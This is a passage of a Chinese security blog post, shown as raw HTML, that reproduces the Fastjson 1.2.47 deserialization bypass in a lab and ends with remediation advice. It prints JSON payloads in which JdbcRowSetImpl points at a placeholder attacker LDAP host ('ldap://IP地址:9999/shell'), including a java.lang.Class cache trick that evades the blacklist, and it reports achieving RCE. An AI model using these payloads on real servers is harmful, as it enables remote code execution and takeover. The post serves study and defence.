<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">@type</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">com.sun.rowset.JdbcRowSetImpl</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">dataSourceName</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">ldap://IP地址:9999/shell</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">autoCommit</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#1E754F;--shiki-dark:#4D9375">true</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">  </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span></span>
<span class="line"></span></code></pre>
<p>此时我们发现，服务器会报500的错误，表示抛出了异常</p>
<p>我们更新下payload，先使用一个非黑名单里的正常类来将我们的恶意类加载缓存，再调用@type来实现RCE</p>
<pre class="shiki shiki-themes vitesse-light vitesse-dark" style="background-color:#ffffff;--shiki-dark-bg:#121212;color:#393a34;--shiki-dark:#dbd7caee" tabindex="0"><code class="language-json"><span class="line"><span style="color:#2993a3;--shiki-dark:#5eaab5">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">name</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">@type</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">java.lang.Class</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">val</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">com.sun.rowset.JdbcRowSetImpl</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">  </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">x</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#1e754f;--shiki-dark:#4d9375">{</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">@type</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">com.sun.rowset.JdbcRowSetImpl</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">,</span></span>
<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">dataSourceName</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#B56959;--shiki-dark:#C98A7D">ldap://IP地址:9999/shell</span><span style="color:#B5695977;--shiki-dark:#C98A7D77">"</span><span style="color:#999999;--shiki-dark:#666666">,</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#99841877;--shiki-dark:#B8A96577">  "</span><span style="color:#998418;--shiki-dark:#B8A965">autoCommit</span><span style="color:#99841877;--shiki-dark:#B8A96577">"</span><span style="color:#999999;--shiki-dark:#666666">:</span><span style="color:#1E754F;--shiki-dark:#4D9375">true</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#999999;--shiki-dark:#666666">  </span><span style="color:#1e754f;--shiki-dark:#4d9375">}</span><span style="color:#393A34;--shiki-dark:#DBD7CAEE"> </span></span>
<span class="line"><span style="color:#2993a3;--shiki-dark:#5eaab5">}</span></span>
<span class="line"></span></code></pre>
<p>这里将恶意类带入缓存的类需要满足如下条件：</p>
<p>1、不在黑名单中</p>
<p>2、拥有自定义的反序列化器，且逻辑特殊</p>
<p>3、必须能够接收val参数</p>
<p>所以，理论上来说不是黑名单里的类都可以，但实际上需要满足的条件不止于此。综上所述，能够实现的类少之又少，java.lang.Class天然满足上述条件。</p>
<p>此时我们再次发送数据包，成功实现RCE</p>
<p><img loading="lazy" src="https://cdn.nlark.com/yuque/0/2026/png/39222866/1774766830441-537ce4c3-c9f0-49cd-bba0-26390dc0f676.png" alt="" /></p>
<p>修复方案：</p>
<p>1、提升JDK版本</p>
<p>JDK 官方在底层代码中“堵死”了攻击者利用 JNDI 远程加载代码的路径。</p>
<p>2、禁用 Fastjson autotype 反序列化 @type 指定的类</p>
<p>autotype 机制允许 JSON 数据告诉服务器“把这个数据转换成哪个类”。如果不对这个功能进行严格限制，攻击者就可以利用它，让服务器去加载并执行恶意的代码，从而完全控制你的服务器。</p>
<p>3、使用 @type 的情况下，配置 Fastjson 反序列化白名单类</p>
<p>如果实在需要使用@type的话，请将黑名单防御改为白名单防御，这样被绕过的可能性大大降低</p>
<div class="tags"><a href="/tags/Java%E5%AE%89%E5%85%A8/" rel="tag"><i class="ic i-tag"></i>Java安全</a></div></div><footer><div class="meta"><span class="item"><span class="icon"><i class="ic i-eye"></i></span><span class="text">总访问量：</span><span class="waline-pageview-count" id="twikoo_visitors" data-path="/2026/03/29/Java安全之Fastjson/">加载中...</span></span><span class="item"><span class="icon"><i class="ic i-calendar-check"></i></span><span class="text">更新于 </span><time title="修改时间：2026-03-29 15:02:51" itemprop="dateModified" datetime="2026-03-29T15:02:51+08:00">2026-03-29</time></span></div><div id="copyright"><ul><li class="author"><strong>本文作者：</strong>Lib0gus的小屋<i class="ic i-at"><em>@</em></i>朝闻道 夕死可矣</li><li class="link"><strong>本文链接：</strong><a href="https://lib0gus.github.io/2026/03/29/Java%E5%AE%89%E5%85%A8%E4%B9%8BFastjson/" title="Java安全之Fastjson">https://lib0gus.github.io/2026/03/29/Java安全之Fastjson/</a></li><li class="license"><strong>版权声明：</strong>本站所有文章除特别声明外，均采用 <a target="_blank" rel="noopener" href="https://creativecommons.org/licenses/by-nc-sa/4.0/deed.zh"><i class="ic i-creative-commons"><em>(CC)</em></i>BY-NC-SA</a> 许可协议。转载请注明出处！</li></ul></div></footer></article></div><div class="post-nav"><div class="item left"><a href="/2026/03/23/Java%E5%AE%89%E5%85%A8%E4%B9%8B%E5%8F%8D%E5%B0%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" rel="prev" itemprop="url" title="Java安全之反射基础知识" style="background-image: linear-gradient(to bottom right, #ecfae3, #aea3f6);"><span class="type">上一篇</span><span class="category"><i class="ic i-flag"></i>代码审计</span><h3>Java安全之反射基础知识</h3></a></div><div class="item right"><a href="/2026/03/30/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro/" rel="next" itemprop="url" title="Java安全之Shiro" style="background-image: linear-gradient(to bottom right, #b4eae2, #8480d8);"><span class="type">下一篇</span><span class="category"><i class="ic i-flag"></i>Java安全</span><h3>Java安全之Shiro</h3></a></div></div><div class="wrap" id="comments"></div></div><div id="sidebar"><div class="inner"><div class="panels"><div class="inner"><div class="contents panel pjax" data-title="文章目录"><ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#fastjson%E6%98%AF%E4%BB%80%E4%B9%88"><span class="toc-number">1.</span> <span class="toc-text"> Fastjson是什么？</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#fastjson%E7%9A%84%E4%BC%98%E7%BC%BA%E7%82%B9"><span class="toc-number">1.1.</span> <span class="toc-text"> Fastjson的优缺点</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#fastjson-1224%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E"><span class="toc-number">2.</span> <span class="toc-text"> Fastjson 1.2.24反序列化漏洞</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%B8%80-%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">2.1.</span> <span class="toc-text"> 一、环境搭建</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#11%E4%BE%9D%E8%B5%96%E9%85%8D%E7%BD%AE"><span class="toc-number">2.1.1.</span> <span class="toc-text"> 1.1依赖配置</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#12-%E5%88%9B%E5%BB%BA%E9%A1%B9%E7%9B%AE"><span class="toc-number">2.1.2.</span> <span class="toc-text"> 1.2 创建项目</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#13-%E7%BC%96%E5%86%99mainjava%E6%B5%8B%E8%AF%95%E7%B1%BB"><span class="toc-number">2.1.3.</span> <span class="toc-text"> 1.3 编写Main.java测试类</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#14-parseobject-%E4%B8%A4%E7%A7%8D%E8%B0%83%E7%94%A8%E6%96%B9%E5%BC%8F%E7%9A%84%E6%9C%AC%E8%B4%A8%E5%8C%BA%E5%88%AB"><span class="toc-number">2.1.4.</span> <span class="toc-text"> 1.4 parseObject 两种调用方式的本质区别</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E4%BA%8C-%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">2.2.</span> <span class="toc-text"> 二、漏洞复现</span></a></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#%E5%AE%98%E6%96%B9%E5%89%8D%E6%9C%9F%E7%BB%B4%E6%8A%A4%E6%96%B9%E6%B3%95"><span class="toc-number">3.</span> <span class="toc-text"> 官方前期维护方法</span></a></li><li class="toc-item toc-level-1"><a class="toc-link" href="#fastjson-1247%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E6%BC%8F%E6%B4%9E%E5%85%A8%E5%B1%80%E7%BC%93%E5%AD%98"><span class="toc-number">4.</span> <span class="toc-text"> Fastjson 1.2.47反序列化漏洞(全局缓存)</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E7%8E%AF%E5%A2%83%E6%90%AD%E5%BB%BA"><span class="toc-number">4.1.</span> <span class="toc-text"> 环境搭建</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="toc-number">4.2.</span> <span class="toc-text"> 漏洞复现</span></a></li></ol></li></ol></div><div class="related panel pjax" data-title="系列文章"><ul><li  class="active"><a href="/2026/03/29/Java%E5%AE%89%E5%85%A8%E4%B9%8BFastjson/" rel="bookmark" title="Java安全之Fastjson">Java安全之Fastjson</a></li><li ><a href="/2026/03/30/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro/" rel="bookmark" title="Java安全之Shiro">Java安全之Shiro</a></li></ul></div><div class="overview panel" data-title="站点概览"><div class="author" itemprop="author" itemscope="itemscope" itemtype="http://schema.org/Person"><img class="image" loading="lazy" decoding="async" itemprop="image" alt="Lib0gus的小屋" src="/assets/test.png"/><p class="name" itemprop="name">Lib0gus的小屋</p><div class="description" itemprop="description">记录学习日常，请犀利点评，指出我的错误</div></div><nav class="state"><div class="item posts"><a href="/archives/"><span class="count">7</span><span class="name">文章</span></a></div><div class="item categories"><a href="/categories/"><span class="count">3</span><span class="name">分类</span></a></div><div class="item tags"><a href="/tags/"><span class="count">4</span><span class="name">标签</span></a></div></nav><div class="social"><a target="_blank" rel="noopener" href="https://github.com/Lib0gus" class="item github" title="https:&#x2F;&#x2F;github.com&#x2F;Lib0gus"><i class="ic i-github"></i></a></div><div class="menu"><li class="item"><a href="/" rel="section"><i class="ic i-home"></i>首页</a></li><li class="item"><a href="/categories/" rel="section"><i class="ic i-th"></i>分类</a></li><li class="item"><a href="/tags/" rel="section"><i class="ic i-tags"></i>标签</a></li><li class="item"><a href="/archives/" rel="section"><i class="ic i-list-alt"></i>归档</a></li></div></div></div></div><ul id="quick"><li class="prev pjax"><a href="/2026/03/30/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro/" rel="prev" title="上一篇"><i class="ic i-chevron-left"></i></a></li><li class="up"><i class="ic i-arrow-up"></i></li><li class="down"><i class="ic i-arrow-down"></i></li><li class="next pjax"><a href="/2026/03/23/Java%E5%AE%89%E5%85%A8%E4%B9%8B%E5%8F%8D%E5%B0%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/" rel="next" title="下一篇"><i class="ic i-chevron-right"></i></a></li><li class="percent"></li></ul></div></div><div class="dimmer"></div></div><div id="player"></div></main><footer id="footer"><div class="inner"><div class="widgets"><div class="rpost pjax"><h2>随机文章</h2><ul><li class="item"><div class="breadcrumb"><a href="/categories/%E6%8A%80%E6%9C%AF%E9%9A%8F%E7%AC%94/" title="分类于技术随笔">技术随笔</a></div><span><a href="/2026/03/11/hello-world/">Hello World</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Java%E5%AE%89%E5%85%A8/" title="分类于Java安全">Java安全</a></div><span><a href="/2026/03/29/Java%E5%AE%89%E5%85%A8%E4%B9%8BFastjson/">Java安全之Fastjson</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="分类于代码审计">代码审计</a></div><span><a href="/2026/03/15/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8Bsql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%EF%BC%88%E4%B8%80%EF%BC%89/">Java代码审计之sql注入漏洞（一）</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/Java%E5%AE%89%E5%85%A8/" title="分类于Java安全">Java安全</a></div><span><a href="/2026/03/30/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro/">Java安全之Shiro</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="分类于代码审计">代码审计</a></div><span><a href="/2026/03/23/Java%E5%AE%89%E5%85%A8%E4%B9%8B%E5%8F%8D%E5%B0%84%E5%9F%BA%E7%A1%80%E7%9F%A5%E8%AF%86/">Java安全之反射基础知识</a></span></li><li class="item"><div class="breadcrumb"><a href="/categories/%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1/" title="分类于代码审计">代码审计</a></div><span><a href="/2026/03/15/Java%E4%BB%A3%E7%A0%81%E5%AE%A1%E8%AE%A1%E4%B9%8Bsql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E%EF%BC%88%E4%BA%8C%EF%BC%89/">Java代码审计之sql注入漏洞（二）</a></span></li><li class="item"><div class="breadcrumb"></div><span><a href="/2026/03/31/Java%E5%AE%89%E5%85%A8%E4%B9%8BShiro-1/">Java安全之Shiro-1</a></span></li></ul></div></div><div class="status"><div class="copyright">&copy; 2022 -<span itemprop="copyrightYear">2026</span><span class="with-love"><i class="ic i-sakura rotate"></i></span><span class="author" itemprop="copyrightHolder">Lib0gus的小屋 @ Lib0gus的博客</span></div><div class="count"><span class="post-meta-item-icon"><i class="ic i-chart-area"></i></span><span title="站点总字数">44k 字</span><span class="post-meta-divider"> | </span><span class="post-meta-item-icon"><i class="ic i-coffee"></i></span><span title="站点阅读时长">40 分钟</span></div><div class="powered-by">基于 <a target="_blank" rel="noopener" href="https://hexo.io/">Hexo</a> & Theme.<a target="_blank" rel="noopener" href="https://github.com/theme-shoka-x/hexo-theme-shokaX/">ShokaX</a></div></div></div></footer></div><script data-config type="text/javascript">var LOCAL = {
    ispost: true,
    path: `2026/03/29/Java安全之Fastjson/`,
    favicon: {
        show: `（●´3｀●）やれやれだぜ`,
        hide: `(´Д｀)大変だ！`
    },
    search: {
        placeholder: "文章搜索",
        empty: "关于 「 ${query} 」，什么也没搜到",
        stats: "${time} ms 内找到 ${hits} 条结果"
    },
    nocopy: "false",
    copyright: `复制成功，转载请遵守 <i class="ic i-creative-commons"></i>BY-NC-SA 协议。`,
    copy_tex: false,
    katex: false,
    mermaid: false,
    audio: undefined,
    nocopy: false,
    outime: true,
    template: `<div class="note warning"><p><span class="label warning">文章时效性提示</span><br>这是一篇发布于 {{publish}} 天前，最后一次更新在 {{updated}} 天前的文章，部分信息可能已经发生改变，请注意甄别。</p></div>`,
    quiz: {
        choice: `单选题`,
        multiple: `多选题`,
        true_false: `判断题`,
        essay: `问答题`,
        gap_fill: `填空题`,
        mistake: `错题备注`
    }
};
</script><script>var _hmt = _hmt || [];
(function () {
    const hm = document.createElement("script");
    hm.src = "https://hm.baidu.com/hm.js?true"
    hm.async = true;
    const s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(hm, s);
 })();</script><script>(function(c,l,a,r,i,t,y){
    c[a]=c[a]||function(){(c[a].q=c[a].q||[]).push(arguments)};
    t=l.createElement(r);t.async=true;t.src="https://www.clarity.ms/tag/"+i;
    y=l.getElementsByTagName(r)[0];y.parentNode.insertBefore(t,y);
})(window, document, "clarity", "script", "true");</script><script async="async" src="https://www.googletagmanager.com/gtag/js?id=true"></script><script>window.dataLayer = window.dataLayer || [];
function gtag() {
    dataLayer.push(arguments);
}
gtag('js', new Date());
gtag('config', 'true');</script><script src="/js/siteInit.js?v=0.5.4" type="module" fetchpriority="high" defer></script></body></html>